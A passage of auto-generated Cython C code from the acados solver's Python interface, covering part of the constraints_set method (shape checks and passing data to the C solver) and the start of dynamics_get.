"acados_template/acados_ocp_solver_pyx.pyx":595 + * + * cdef int dims[2] + * acados_solver_common.ocp_nlp_constraint_dims_get_from_attr(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_out, stage, field, &dims[0]) + * + */ + ocp_nlp_constraint_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_2, (&(__pyx_v_dims[0]))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":600 + * cdef double[::1,:] value + * + * value_shape = value_.shape # <<<<<<<<<<<<<< + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + */ + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_v_value_, __pyx_n_s_shape); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 600, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_value_shape = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":601 + * + * value_shape = value_.shape + * if len(value_shape) == 1: # <<<<<<<<<<<<<< + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) + */ + __pyx_t_3 = PyObject_Length(__pyx_v_value_shape); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(0, 601, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 == 1); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":602 + * value_shape = value_.shape + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) # <<<<<<<<<<<<<< + * value = np.asfortranarray(value_[None,:]) + * + */ + __pyx_t_1 = __Pyx_GetItemInt(__pyx_v_value_shape, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 602, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 602, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1); + __Pyx_INCREF(__pyx_int_0); + __Pyx_GIVEREF(__pyx_int_0); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_int_0); + __pyx_t_1 = 0; + __Pyx_DECREF_SET(__pyx_v_value_shape, __pyx_t_5); + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":603 + * if len(value_shape) == 1: + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) # <<<<<<<<<<<<<< + * + * elif len(value_shape) == 2: + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_GetItem(__pyx_v_value_, __pyx_tuple__26); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_7 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_6))) { + __pyx_t_7 = PyMethod_GET_SELF(__pyx_t_6); + if (likely(__pyx_t_7)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_6); + __Pyx_INCREF(__pyx_t_7); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_6, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_7, __pyx_t_1}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_6, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dcd__double(__pyx_t_5, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 603, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":601 + * + * value_shape = value_.shape + * if len(value_shape) == 1: # <<<<<<<<<<<<<< + * value_shape = (value_shape[0], 0) + * value = np.asfortranarray(value_[None,:]) + */ + goto __pyx_L3; + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":605 + * value = np.asfortranarray(value_[None,:]) + * + * elif len(value_shape) == 2: # <<<<<<<<<<<<<< + * # Get elements in column major order + * value = np.asfortranarray(value_) + */ + __pyx_t_3 = PyObject_Length(__pyx_v_value_shape); if (unlikely(__pyx_t_3 == ((Py_ssize_t)-1))) __PYX_ERR(0, 605, __pyx_L1_error) + __pyx_t_4 = (__pyx_t_3 == 2); + if (__pyx_t_4) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":607 + * elif len(value_shape) == 2: + * # Get elements in column major order + * value = np.asfortranarray(value_) # <<<<<<<<<<<<<< + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + */ + __Pyx_GetModuleGlobalName(__pyx_t_6, __pyx_n_s_np); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 607, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_asfortranarray); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 607, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = NULL; + __pyx_t_8 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_6 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_6)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_6); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_8 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_6, __pyx_v_value_}; + __pyx_t_5 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_8, 1+__pyx_t_8); + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 607, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + __pyx_t_9 = __Pyx_PyObject_to_MemoryviewSlice_dcd__double(__pyx_t_5, PyBUF_WRITABLE); if (unlikely(!__pyx_t_9.memview)) __PYX_ERR(0, 607, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_v_value = __pyx_t_9; + __pyx_t_9.memview = NULL; + __pyx_t_9.data = NULL; + + /* "acados_template/acados_ocp_solver_pyx.pyx":605 + * value = np.asfortranarray(value_[None,:]) + * + * elif len(value_shape) == 2: # <<<<<<<<<<<<<< + * # Get elements in column major order + * value = np.asfortranarray(value_) + */ + } + __pyx_L3:; + + /* "acados_template/acados_ocp_solver_pyx.pyx":609 + * value = np.asfortranarray(value_) + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: # <<<<<<<<<<<<<< + * raise Exception(f'AcadosOcpSolverCython.constraints_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + */ + __pyx_t_5 = __Pyx_GetItemInt(__pyx_v_value_shape, 0, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[0])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = PyObject_RichCompare(__pyx_t_5, __pyx_t_1, Py_NE); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (!__pyx_t_10) { + } else { + __pyx_t_4 = __pyx_t_10; + goto __pyx_L5_bool_binop_done; + } + __pyx_t_6 = __Pyx_GetItemInt(__pyx_v_value_shape, 1, long, 1, __Pyx_PyInt_From_long, 0, 0, 1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[1])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_5 = PyObject_RichCompare(__pyx_t_6, __pyx_t_1, Py_NE); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_10 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 609, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_4 = __pyx_t_10; + __pyx_L5_bool_binop_done:; + if (unlikely(__pyx_t_4)) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":611 + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + * raise Exception(f'AcadosOcpSolverCython.constraints_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') # <<<<<<<<<<<<<< + * + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, \ + */ + __pyx_t_5 = PyTuple_New(9); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = 0; + __pyx_t_11 = 127; + __Pyx_INCREF(__pyx_kp_u_for_field); + __pyx_t_3 += 12; + __Pyx_GIVEREF(__pyx_kp_u_for_field); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_kp_u_for_field); + __pyx_t_1 = __Pyx_PyUnicode_Unicode(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_at_stage); + __pyx_t_3 += 11; + __Pyx_GIVEREF(__pyx_kp_u_at_stage); + PyTuple_SET_ITEM(__pyx_t_5, 2, __pyx_kp_u_at_stage); + __pyx_t_1 = __Pyx_PyUnicode_From_int(__pyx_v_stage, 0, ' ', 'd'); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 3, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_with_dimension); + __pyx_t_3 += 16; + __Pyx_GIVEREF(__pyx_kp_u_with_dimension); + PyTuple_SET_ITEM(__pyx_t_5, 4, __pyx_kp_u_with_dimension); + __pyx_t_1 = __Pyx_carray_to_py_int(__pyx_v_dims, 2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_6 = __Pyx_PySequence_Tuple(__pyx_t_1); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_t_6, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 5, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u_you_have); + __pyx_t_3 += 11; + __Pyx_GIVEREF(__pyx_kp_u_you_have); + PyTuple_SET_ITEM(__pyx_t_5, 6, __pyx_kp_u_you_have); + __pyx_t_1 = __Pyx_PyObject_FormatSimple(__pyx_v_value_shape, __pyx_empty_unicode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_11 = (__Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) > __pyx_t_11) ? __Pyx_PyUnicode_MAX_CHAR_VALUE(__pyx_t_1) : __pyx_t_11; + __pyx_t_3 += __Pyx_PyUnicode_GET_LENGTH(__pyx_t_1); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 7, __pyx_t_1); + __pyx_t_1 = 0; + __Pyx_INCREF(__pyx_kp_u__7); + __pyx_t_3 += 1; + __Pyx_GIVEREF(__pyx_kp_u__7); + PyTuple_SET_ITEM(__pyx_t_5, 8, __pyx_kp_u__7); + __pyx_t_1 = __Pyx_PyUnicode_Join(__pyx_t_5, 9, __pyx_t_3, __pyx_t_11); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 611, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":610 + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: + * raise Exception(f'AcadosOcpSolverCython.constraints_set(): mismatching dimension' + # <<<<<<<<<<<<<< + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + * + */ + __pyx_t_5 = __Pyx_PyUnicode_Concat(__pyx_kp_u_AcadosOcpSolverCython_constraint, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 610, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyObject_CallOneArg(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0])), __pyx_t_5); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 610, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_Raise(__pyx_t_1, 0, 0, 0); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __PYX_ERR(0, 610, __pyx_L1_error) + + /* "acados_template/acados_ocp_solver_pyx.pyx":609 + * value = np.asfortranarray(value_) + * + * if value_shape[0] != dims[0] or value_shape[1] != dims[1]: # <<<<<<<<<<<<<< + * raise Exception(f'AcadosOcpSolverCython.constraints_set(): mismatching dimension' + + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":614 + * + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, \ + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) # <<<<<<<<<<<<<< + * + * return + */ + __pyx_t_12 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_12) && PyErr_Occurred())) __PYX_ERR(0, 614, __pyx_L1_error) + if (unlikely(!__pyx_v_value.memview)) { __Pyx_RaiseUnboundLocalError("value"); __PYX_ERR(0, 614, __pyx_L1_error) } + __pyx_t_13 = 0; + __pyx_t_14 = 0; + __pyx_t_8 = -1; + if (__pyx_t_13 < 0) { + __pyx_t_13 += __pyx_v_value.shape[0]; + if (unlikely(__pyx_t_13 < 0)) __pyx_t_8 = 0; + } else if (unlikely(__pyx_t_13 >= __pyx_v_value.shape[0])) __pyx_t_8 = 0; + if (__pyx_t_14 < 0) { + __pyx_t_14 += __pyx_v_value.shape[1]; + if (unlikely(__pyx_t_14 < 0)) __pyx_t_8 = 1; + } else if (unlikely(__pyx_t_14 >= __pyx_v_value.shape[1])) __pyx_t_8 = 1; + if (unlikely(__pyx_t_8 != -1)) { + __Pyx_RaiseBufferIndexError(__pyx_t_8); + __PYX_ERR(0, 614, __pyx_L1_error) + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":613 + * f' for field "{field_}" at stage {stage} with dimension {tuple(dims)} (you have {value_shape})') + * + * acados_solver_common.ocp_nlp_constraints_model_set(self.nlp_config, \ # <<<<<<<<<<<<<< + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) + * + */ + (void)(ocp_nlp_constraints_model_set(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_in, __pyx_v_stage, __pyx_t_12, ((void *)(&(*((double *) ( /* dim=1 */ (( /* dim=0 */ ((char *) (((double *) __pyx_v_value.data) + __pyx_t_13)) ) + __pyx_t_14 * __pyx_v_value.strides[1]) ))))))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":616 + * self.nlp_dims, self.nlp_in, stage, field, &value[0][0]) + * + * return # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":584 + * + * + * def constraints_set(self, int stage, str field_, value_): # <<<<<<<<<<<<<< + * """ + * Set numerical data in the constraint module of the solver. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __PYX_XCLEAR_MEMVIEW(&__pyx_t_9, 1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.constraints_set", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XDECREF(__pyx_v_field); + __PYX_XCLEAR_MEMVIEW(&__pyx_v_value, 1); + __Pyx_XDECREF(__pyx_v_value_shape); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":619 + * + * + * def dynamics_get(self, int stage, str field_): # <<<<<<<<<<<<<< + * """ + * Get numerical data from the dynamics module of the solver: + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get, "\n Get numerical data from the dynamics module of the solver:\n\n :param stage: integer corresponding to shooting node\n :param field: string, e.g. 'A'\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get = {"dynamics_get", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_41dynamics_get(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + int __pyx_v_stage; + PyObject *__pyx_v_field_ = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("dynamics_get (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_stage,&__pyx_n_s_field_2,0}; + PyObject* values[2] = {0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_stage)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 619, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_field_2)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 619, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("dynamics_get", 1, 2, 2, 1); __PYX_ERR(0, 619, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "dynamics_get") < 0)) __PYX_ERR(0, 619, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 2)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + } + __pyx_v_stage = __Pyx_PyInt_As_int(values[0]); if (unlikely((__pyx_v_stage == (int)-1) && PyErr_Occurred())) __PYX_ERR(0, 619, __pyx_L3_error) + __pyx_v_field_ = ((PyObject*)values[1]); + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("dynamics_get", 1, 2, 2, __pyx_nargs); __PYX_ERR(0, 619, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.dynamics_get", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + if (unlikely(!__Pyx_ArgTypeTest(((PyObject *)__pyx_v_field_), (&PyUnicode_Type), 1, "field_", 1))) __PYX_ERR(0, 619, __pyx_L1_error) + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_stage, __pyx_v_field_); + + /* function exit code */ + goto __pyx_L0; + __pyx_L1_error:; + __pyx_r = NULL; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_) { + PyObject *__pyx_v_field = NULL; + int __pyx_v_dims[2]; + PyArrayObject *__pyx_v_out = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out; + __Pyx_Buffer __pyx_pybuffer_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + char const *__pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyArrayObject *__pyx_t_6 = NULL; + char const *__pyx_t_7; + char *__pyx_t_8; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("dynamics_get", 0); + __pyx_pybuffer_out.pybuffer.buf = NULL; + __pyx_pybuffer_out.refcount = 0; + __pyx_pybuffernd_out.data = NULL; + __pyx_pybuffernd_out.rcbuffer = &__pyx_pybuffer_out; + + /* "acados_template/acados_ocp_solver_pyx.pyx":626 + * :param field: string, e.g. 'A' + * """ + * field = field_.encode('utf-8') # <<<<<<<<<<<<<< + * + * # get dims + */ + if (unlikely(__pyx_v_field_ == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 626, __pyx_L1_error) + } + __pyx_t_1 = PyUnicode_AsUTF8String(__pyx_v_field_); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 626, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_v_field = __pyx_t_1; + __pyx_t_1 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":630 + * # get dims + * cdef int[2] dims + * acados_solver_common.ocp_nlp_dynamics_dims_get_from_attr(self.nlp_config, self.nlp_dims, self.nlp_out, stage, field, &dims[0]) # <<<<<<<<<<<<<< + * + * # create output data + */ + __pyx_t_2 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_2) && PyErr_Occurred())) __PYX_ERR(0, 630, __pyx_L1_error) + ocp_nlp_dynamics_dims_get_from_attr(__pyx_v_self->nlp_config, __pyx_v_self->nlp_dims, __pyx_v_self->nlp_out, __pyx_v_stage, __pyx_t_2, (&(__pyx_v_dims[0]))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":633 + * + * # create output data + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out = np.zeros((dims[0], dims[1]), order='F') # <<<<<<<<<<<<<< + * + * # call getter + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_zeros); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyInt_From_int((__pyx_v_dims[0])); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_4 = __Pyx_PyInt_From_int((__pyx_v_dims[1])); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = PyTuple_New(2); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 633, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_5, 0, __pyx_t_1); + __Pyx_GIVEREF(__pyx_t_4); + PyTuple_SET_ITEM(__pyx_t_5, 1, __pyx_t_4); + __pyx_t_1 = 0; + 